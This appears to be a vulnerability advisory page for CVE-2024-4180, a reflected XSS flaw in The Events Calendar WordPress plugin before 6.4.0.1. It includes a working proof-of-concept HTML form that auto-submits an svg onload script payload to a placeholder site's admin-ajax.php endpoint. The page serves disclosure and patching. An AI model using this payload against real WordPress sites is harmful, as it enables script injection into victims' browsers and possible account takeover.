Lucene search
Marc MontpasWPEX-ID:B2A92316-E404-4A5E-8426-F88DF6E87550HistoryMay 14, 2024 - 12:00 a.m.
The Events Calendar < 6.4.0.1 - Reflected XSS
2024-05-1400:00:00
Marc Montpas
22
reflected xss
the events calendar
update by may 28 2024
Description The plugin does not properly sanitize user-submitted content when rendering some views via AJAX.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
<form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tribe_events_views_v2_fallback">
<input type="hidden" name="view" value="reflector">
<input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
</form>
</body>
</html>Related
cve
cve
CVE-2024-4180
2024-06-04 06:15:10
wpvulndb
wpvulndb
The Events Calendar < 6.4.0.1 - Reflected XSS
2024-05-14 00:00:00
cvelist
cvelist
CVE-2024-4180 The Events Calendar < 6.4.0.1 - Reflected XSS
2024-06-04 06:00:02
nvd
nvd
CVE-2024-4180
2024-06-04 06:15:10
vulnrichment
vulnrichment
CVE-2024-4180 The Events Calendar < 6.4.0.1 - Reflected XSS
2024-06-04 06:00:02
wordfence
wordfence
6.8 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:B2A92316-E404-4A5E-8426-F88DF6E87550